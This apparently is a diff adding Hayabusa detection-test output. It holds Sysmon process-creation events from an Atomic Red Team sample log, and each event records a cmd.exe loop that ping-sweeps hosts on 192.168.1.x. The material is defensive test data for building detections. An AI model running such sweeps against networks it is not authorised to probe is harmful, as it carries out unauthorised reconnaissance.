+2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.168 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6544 | PGUID: 747F3D96-D94A-5D31-0000-0010D76C3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.169 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6300 | PGUID: 747F3D96-D94B-5D31-0000-0010CD6F3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.170 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D94B-5D31-0000-0010B9723600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.171 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4032 | PGUID: 747F3D96-D94C-5D31-0000-0010BA763600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.172 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1604 | PGUID: 747F3D96-D94C-5D31-0000-0010B9793600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.173 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1596 | PGUID: 747F3D96-D94D-5D31-0000-0010EB853600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.174 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5952 | PGUID: 747F3D96-D94D-5D31-0000-0010D9883600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.175 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2752 | PGUID: 747F3D96-D94E-5D31-0000-0010C58B3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.176 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1844 | PGUID: 747F3D96-D94E-5D31-0000-00108C943600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.177 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3856 | PGUID: 747F3D96-D94F-5D31-0000-001079973600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.178 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3796 | PGUID: 747F3D96-D94F-5D31-0000-0010659A3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.179 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1244 | PGUID: 747F3D96-D950-5D31-0000-0010659D3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.180 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3328 | PGUID: 747F3D96-D950-5D31-0000-001051A03600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.181 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 592 | PGUID: 747F3D96-D951-5D31-0000-00103EA33600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.182 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D951-5D31-0000-00102BA63600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.183 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D952-5D31-0000-001017A93600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.184 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D952-5D31-0000-001003AC3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.185 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D953-5D31-0000-0010EFAE3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.186 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D953-5D31-0000-0010B7B73600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.187 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D953-5D31-0000-0010A3BA3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.188 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D954-5D31-0000-00108FBD3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.189 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-D955-5D31-0000-0010D6C03600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.190 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 684 | PGUID: 747F3D96-D955-5D31-0000-0010C2C33600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.191 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 504 | PGUID: 747F3D96-D956-5D31-0000-0010AEC63600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.192 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6608 | PGUID: 747F3D96-D956-5D31-0000-00109AC93600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.193 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1128 | PGUID: 747F3D96-D957-5D31-0000-001086CC3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.194 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D957-5D31-0000-001072CF3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.195 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5244 | PGUID: 747F3D96-D958-5D31-0000-00105ED23600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.196 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4460 | PGUID: 747F3D96-D958-5D31-0000-001026DB3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.197 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-D959-5D31-0000-001016DE3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.198 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-D959-5D31-0000-001007E13600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.199 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 936 | PGUID: 747F3D96-D95A-5D31-0000-0010F7E33600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.200 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4480 | PGUID: 747F3D96-D95A-5D31-0000-0010EBE63600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.201 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6464 | PGUID: 747F3D96-D95A-5D31-0000-0010DBE93600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.202 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2392 | PGUID: 747F3D96-D95B-5D31-0000-0010CCEC3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.203 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D95C-5D31-0000-001039F03600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.204 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D95C-5D31-0000-0010F7F53600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.205 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 884 | PGUID: 747F3D96-D95D-5D31-0000-001001F93600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.206 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D95D-5D31-0000-0010C8013700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.207 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3436 | PGUID: 747F3D96-D95E-5D31-0000-0010B5043700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.208 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6296 | PGUID: 747F3D96-D95E-5D31-0000-0010A1073700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.209 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D95F-5D31-0000-0010930A3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.210 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6184 | PGUID: 747F3D96-D95F-5D31-0000-00107F0D3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.211 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-D960-5D31-0000-00106B103700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.212 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D960-5D31-0000-001057133700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
